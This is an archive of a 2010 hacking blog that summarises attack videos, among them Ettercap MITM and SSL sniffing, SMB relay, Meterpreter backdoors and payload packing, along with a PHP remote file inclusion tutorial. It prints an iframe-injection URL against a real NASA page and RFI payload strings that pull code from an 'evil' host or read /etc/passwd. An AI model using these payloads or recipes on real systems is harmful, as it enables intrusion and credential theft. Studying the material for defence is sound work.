Friday, April 30, 2010

DNS Spoofing And Browser Spying Part 1



This is the first of three videos explaining various examples of sniffing with the Ettercap-NG tool on BackTrack 4 in a local area network scenario. This part covers OS fingerprinting, ARP poisoning and one example using Etterfilter.

Wednesday, April 28, 2010

HTML Injection in NASA Website

Last February 25, 2010 I made a full-disclosure type of post here regarding multiple nasa.gov server "0-day" vulnerabilities. I believe most (if not all) of these live vulnerabilities have already been fixed, thanks to media like CBS News, who broke it (together with the NSA defacement) to the public in one of their "cyber war" reports involving the China Google hacking incident, if my memory serves me right. Anyway, here is the last exploit, which is a good example of HTML injection for those who are interested in studying it further.

http://starbrite.jpl.nasa.gov/pds/viewDataset.jsp?dsid=error%3E%3Ciframe%20src=%22http://www.hackthissite.org%22%20%20height=%22300%22%20width=%22800%22%3E%3C/iframe%3E

Monday, April 26, 2010

Sniffing SSL Secured Logins with Ettercap


A short video showing how easy it is to intercept HTTPS traffic on a switched local network by spoofing the SSL certificate in a man-in-the-middle attack with Ettercap. The attacker uses one-way ARP poisoning against the victim and issues fake, spoofed SSL certificates on a switched Ethernet network.

Friday, April 23, 2010

DHCP Spoofing MITM Attack Using Ettercap



This video shows how to spoof DHCP address assignment using Ettercap. When a new PC that is configured to obtain its IP address dynamically joins the network, an attacker can spoof the DHCP assignment process and supply his own settings, such as a gateway that has been configured to sniff usernames and passwords.

Thursday, April 22, 2010

Bluetooth sniffing in Linux


A very good video showing how to sniff the Bluetooth PIN while two Bluetooth devices pair, and then crack it.

Tuesday, April 20, 2010

Securing Web Applications



Securing Web Services - Presentation Transcript
  1. Securing Web Applications Tara Kissoon, CISA, CISSP Visa Inc.
  2. Objectives The participant will learn more about: How to integrate the OWASP Top 10 to mitigate web application security vulnerabilities.
  3. What is an application? An application: – Defined as user software – Is made up of a number of files, including configuration files, executable programs and data files. – Is layered above an operating system and uses the functionality of the operating system to deliver its service. – The operating system provides a number of mechanisms used for securing the application. – Contains security functionality that uses mechanisms not residing within the operating system.
  4. This presentation is on web services security, pointing at almost all of the areas that require attention for web application security. It shows how to effectively manage the application development lifecycle and how to integrate the OWASP Top 10 to develop any application with security in mind.

    A1 - Cross Site Scripting (XSS)

    A2 - Injection Flaws

    A3 - Malicious File Execution

    A4 - Insecure Direct Object Reference

    A5 - Cross Site Request Forgery (CSRF)

    A6 - Information Leakage and Improper Error Handling

    A7 - Broken Authentication and Session Management

    A8 - Insecure Cryptographic Storage

    A9 - Insecure Communications

    A10 - Failure to Restrict URL Access

Monday, April 19, 2010

Windows SMB Relay Exploit



In this Underground video, Overide demonstrates how to obtain root access on a fully patched Windows XP SP3 machine. He exploits a flaw in Windows Server Message Block (SMB), which is used to provide shared access to files between hosts on a network, and uses the Metasploit Framework to run the exploit. It works by relaying an SMB authentication request to another host, which provides Metasploit with an authenticated SMB session; if the user is an administrator, Metasploit is able to execute code on the target computer, such as a reverse shell. For this exploit to run, the target computer must try to authenticate to Metasploit, so Overide forces the target to perform an SMB authentication attempt by using an Ettercap filter.

A live demonstration of obtaining admin access on a Windows XP SP3 machine. It exploits a flaw in Windows Server Message Block (SMB), which provides shared access to files and folders on a network, using the Metasploit Framework to run the exploit. It works by relaying an SMB authentication request to another host, which provides Metasploit with an authenticated SMB session; if the user is an administrator, Metasploit is able to execute code on the target computer and can even get a reverse shell. The hacker forces the target computer to perform an SMB authentication attempt by using an Ettercap filter, so that the target is redirected to Metasploit for authentication.

Sunday, April 18, 2010

Remote Shell with a Word document



Using a Metasploit payload on Backtrack 4 to create a macro enabled Microsoft Word document which upon execution opens up a remote shell.

Friday, April 16, 2010

Honeypots


Honey Pot systems are decoy servers or systems set up to gather information about an attacker or intruder into your systems. It is important to remember that Honey Pots do not replace other traditional Internet security systems; they are an additional layer or system.

Honey Pots can be set up inside, outside or in the DMZ of a firewall design, or even in all of these locations, although they are most often deployed inside the firewall for control purposes. In a sense, they are variants of standard Intrusion Detection Systems (IDS) but with more of a focus on information gathering and deception.

An example of a Honey Pot system installed in a traditional Internet security design:
figure 1
A Honey Pot system is set up to be easier prey for intruders than true production systems, but with minor system modifications so that their activity can be logged or traced. The general thought is that once an intruder breaks into a system, they will come back for subsequent visits. During these subsequent visits, additional information can be gathered, and additional attempts at file, security and system access on the Honey Pot can be monitored and saved.

Generally, there are two popular reasons or goals behind setting up a Honey Pot:
  1. Learn how intruders probe and attempt to gain access to your systems. The general idea is that since a record of the intruder’s activities is kept, you can gain insight into attack methodologies to better protect your real production systems.
  2. Gather forensic information required to aid in the apprehension or prosecution of intruders. This is the sort of information often needed to provide law enforcement officials with the details needed to prosecute.
The common line of thought in setting up Honey Pot systems is that it is acceptable to use lies or deception when dealing with intruders. What this means to you when setting up a Honey Pot is that certain goals have to be considered.

Those goals are:
  1. The Honey Pot system should appear as generic as possible. If you are deploying a Microsoft NT-based system, it should appear to the potential intruder that the system has not been modified, or they may disconnect before much information is collected.
  2. You need to be careful about what traffic you allow the intruder to send back out to the Internet, since you don't want to become a launch point for attacks against other entities on the Internet. (One of the reasons for installing a Honey Pot inside the firewall!)
  3. You will want to make your Honey Pot an interesting site by placing "dummy" information on it or making it appear as though the intruder has found an "intranet" server, etc. Expect to spend some time making your Honey Pot appear legitimate, so that intruders will spend enough time investigating and perusing the system for you to gather as much forensic information as possible.
Some caveats exist that should be considered when implementing a Honey Pot system. Some of the more important are:

The first caveat is the consideration that if the information gathered from a Honey Pot system is used for prosecution purposes, it may or may not be deemed admissible in court. While information regarding this issue is difficult to come by, having been hired as an expert witness for forensic data recovery purposes, I have serious reservations regarding whether or not all courts will accept this as evidence or if non-technical juries are able to understand the legitimacy of it as evidence.

The second main caveat for consideration is whether hacking organizations will rally against an organization that has set "traps" and make them a public target for other hackers. Examples of this sort of activity can be found easily on any of the popular hacker’s sites or their publications.

Thursday, April 15, 2010

PHP Remote File Inclusion



Remote File Inclusion (RFI) is a technique used to attack websites from a remote computer. RFI allows malicious users to run their own PHP code on a vulnerable website, using any remote file simply by editing the URL. For example, a web shell can display the files and folders on the server, add, edit or delete files and folders, send spam and even get hold of root.

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites; it allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file but, depending on the severity, it can also lead to, among other things:
  • Code execution on the web server
  • Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site scripting (XSS).
  • Denial of Service (DoS)
  • Data Theft/Manipulation



In PHP the main cause is the use of unvalidated external variables such as $_GET, $_POST and $_COOKIE with a filesystem function, most notably the include and require statements. Most of the vulnerabilities can be attributed to novice programmers not being familiar with all of the capabilities of the PHP language. PHP has an allow_url_fopen directive which, if enabled, allows filesystem functions to take a URL, letting them retrieve data from remote locations. An attacker alters a variable that is passed to one of these functions to make it include malicious code from a remote resource. To mitigate this, all user input needs to be validated before being used.

Example

Consider this PHP script, which includes a file named by the request:

   <?php
      $color = 'blue';
      if (isset( $_GET['COLOR'] ) )
         $color = $_GET['COLOR'];
      require( $color . '.php' );   // user input becomes part of the include path
   ?>
   <form method="get">
      <select name="COLOR">
         <option value="red">red</option>
         <option value="blue">blue</option>
      </select>
      <input type="submit">
   </form>

The developer intended only blue.php and red.php to be used as options. But since anyone can easily insert arbitrary values into COLOR, it is possible to include code from other files:
  • /vulnerable.php?COLOR=http://evil/exploit? - includes a remotely hosted file containing an exploit.
  • /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - executes code from an already uploaded file called exploit.php.
  • /vulnerable.php?COLOR=../../../../../../../../etc/passwd - allows an attacker to read the contents of the passwd file on a UNIX system via directory traversal.
  • /vulnerable.php?COLOR=C:\\notes.txt - example using the NULL meta character to remove the .php suffix, allowing access to files other than .php. (With magic_quotes_gpc enabled, special characters are escaped, which disables the use of the null character and limits the attack.)
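The same script with the include target constrained, as an added example rather than code from the original page. It assumes blue.php and red.php sit in the same directory as the script; the $pages allowlist is the construction that replaces string concatenation, so the request value is only ever a lookup key and none of the four payloads above can reach require():

```php
<?php
// Added example, not from the original page: the colour-selection script
// rewritten so that the request parameter can never become a path or a URL.
// Assumes blue.php and red.php live beside this script.

// Allowlist: request value -> file to include. The user's input is only
// ever used as an array key; it is never concatenated into the path.
$pages = [
    'blue' => __DIR__ . '/blue.php',
    'red'  => __DIR__ . '/red.php',
];

$color = 'blue';                                  // default, as in the original
if (isset($_GET['COLOR']) && is_string($_GET['COLOR'])) {
    $color = $_GET['COLOR'];
}

if (!array_key_exists($color, $pages)) {
    // Anything outside the allowlist (a URL, ../ traversal, a NUL byte,
    // an absolute Windows path) is refused instead of being appended to '.php'.
    http_response_code(400);
    exit('Unknown colour selection.');
}

require $pages[$color];
?>
<form method="get">
   <select name="COLOR">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>
```

The is_string() check matters because a request such as COLOR[]=x hands PHP an array, which must not be treated as a key. As defence in depth, the allow_url_fopen point made above can be enforced server-wide in php.ini with allow_url_include = Off, the directive that governs whether include and require accept URLs at all, so that a later regression in the script still cannot pull code from a remote host.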

Wednesday, April 14, 2010

SSH Hacking



In this video, a shell script does the work on Linux of breaking into an SSH account: a dictionary attack is launched against SSH using the script to crack the password.

Tuesday, April 13, 2010

Using NetCat as a Backdoor


In this video a Windows RPC exploit is used with the help of Metasploit on BackTrack. After exploiting the RPC vulnerability in Windows, the hacker uploads the Netcat tool to regain access whenever he wants.

Monday, April 12, 2010

Metasploit Autopwn Tool

 

This video shows the Metasploit Autopwn tool in action. After identifying a victim's machine using port scanning techniques, run the Metasploit Framework and connect to the SQLite database. Then run a port scan on the victim's machine so that the result is saved in the database. After that, run the Autopwn tool against the port scan result; Autopwn will automatically run all the exploits against the open ports. When the attack completes successfully, we get open sessions. This can also be achieved by running Autopwn against the result saved by Nessus in NBE format.

Sunday, April 11, 2010

Dump Cleartext Passwords From Windows Memory



MDD is a physical memory acquisition tool for imaging Windows based computers created by the innovative minds at ManTech International Corporation. MDD is capable of acquiring memory images from Win2000, XP, Vista and Windows Server.

Friday, April 9, 2010

DNS Spoof Virtual Hosts



DNS spoofing is a type of MITM attack in which the victim's computer is sent a fake DNS reply for a particular website, forcing the machine to visit a different site. But when the spoofed IP is hosting multiple virtual sites distinguished by Host headers, and the attacker wants to use this IP as a fake DNS reply, the server will not be able to determine the proper destination, because the Host header it expects will not be present in the request. Hence the DNS spoofing attack will not succeed.

In this video, Ettercap is combined with a C program to change the Host header on the fly and submit a new GET request to the web server, which allows an attacker to successfully launch a DNS spoofing attack with an IP hosting multiple virtual websites.

Thursday, April 8, 2010

Attacking Oracle with the Metasploit Framework



The Oracle Database (commonly referred to as Oracle RDBMS or simply as Oracle) is a relational database management system (RDBMS) produced and marketed by Oracle Corporation. As of 2009, Oracle remains a major presence in database computing.
Larry Ellison and his friends and former co-workers Bob Miner and Ed Oates started the consultancy Software Development Laboratories (SDL) in 1977. SDL developed the original version of the Oracle software. The name Oracle comes from the code-name of a CIA-funded project Ellison had worked on while previously employed by Ampex.

Wednesday, April 7, 2010

Auditing Anti-Virus Configuration and Installation with Nessus 3



Nessus is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example:
  • Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
  • Misconfiguration (e.g. open mail relay, missing patches, etc).
  • Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
  • Denials of service against the TCP/IP stack by using mangled packets.
On UNIX (including Mac OS X), it consists of nessusd, the Nessus daemon, which does the scanning, and nessus, the client, which controls scans and presents the vulnerability results to the user. For Windows, Nessus 3 installs as an executable and has a self-contained scanning, reporting and management system. According to surveys done by sectools.org, Nessus is the world's most popular vulnerability scanner, taking first place in the 2000, 2003, and 2006 security tools survey. Tenable estimates that it is used by over 75,000 organizations worldwide.

Tuesday, April 6, 2010

Exploiting XP with SAINT



The SAINT vulnerability scanner identifies threats across your network including devices, operating systems, desktop applications, web applications, databases, and more. The penetration testing component is integrated with the SAINT vulnerability scanner. SAINTexploit automates the penetration testing process, examines vulnerabilities discovered by the scanner, exposes where the attacker could breach the network, and exploits the vulnerability to prove its existence beyond doubt.

Monday, April 5, 2010

Exploiting Windows Vista with Core Impact 8



CORE IMPACT is a commercial automated penetration testing software solution developed by Core Security Technologies which allows the user to probe for and exploit security vulnerabilities in computer networks, endpoints and web applications.
The product's interface is designed to be usable by individuals both with and without specialized training in penetration testing and vulnerability assessment, and includes functions for generating reports from the gathered information. It is used by over 800 companies and government entities worldwide.
Core Impact is designed to evaluate the security of an office ecosystem as a whole, checking for known exploits, vulnerability to psychological attack, viability of current software and hardware security, as well as checking for compliance with government regulation.

Hacking Guestbook (Redirect)

Sunday, April 4, 2010

Owning with Nessus and Metasploit



Nessus is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example:
  • Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
  • Misconfiguration (e.g. open mail relay, missing patches, etc).
  • Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
  • Denials of service against the TCP/IP stack by using mangled packets.
On UNIX (including Mac OS X), it consists of nessusd, the Nessus daemon, which does the scanning, and nessus, the client, which controls scans and presents the vulnerability results to the user. For Windows, Nessus 3 installs as an executable and has a self-contained scanning, reporting and management system.
According to surveys done by sectools.org, Nessus is the world's most popular vulnerability scanner, taking first place in the 2000, 2003, and 2006 security tools survey. Tenable estimates that it is used by over 75,000 organizations worldwide.

Saturday, April 3, 2010

Packing Metasploit's Meterpreter with Calculator using IExpress



This video demonstrates how a built in tool of XP and Vista (IExpress), can be used to pack a malicious payload with a real program to make it less likely for a user to think anything malicious is happening.

Friday, April 2, 2010

Meterpreter as a Backdoor



A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected. The backdoor may take the form of an installed program (e.g., Back Orifice), or could be a modification to an existing program or hardware device.

Pass the Hash with modified SMB Client Vulnerability



A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to "decrypt" the password hash into its clear-text equivalent.

In order for this to be used in a malicious manner, the attacker must first obtain a valid username and LanMan hash for a user account known to have access permissions to the resource on the remote NT host.

Thursday, April 1, 2010

Cracking Tutorial



Software cracking is the modification of software to remove protection methods: copy protection, trial/demo version, serial number, hardware key, date checks, CD check or software annoyances like nag screens and adware.
The distribution and use of cracked copies is illegal in almost every developed country. There have been many lawsuits over cracking software, but most had to do with the distribution of the duplicated product rather than the process of defeating the protection, due to the difficulty of constructing legally sound proof of individual guilt in the latter instance. In the United States, the Digital Millennium Copyright Act (DMCA) made software cracking, as well as the distribution of information that facilitates software cracking, illegal. However, the law has hardly been tested in U.S. courts in cases of reverse engineering for personal use only. The European Union passed the EU Copyright Directive in May 2001, which makes software copyright infringement illegal as the member states pass legislation pursuant to the directive.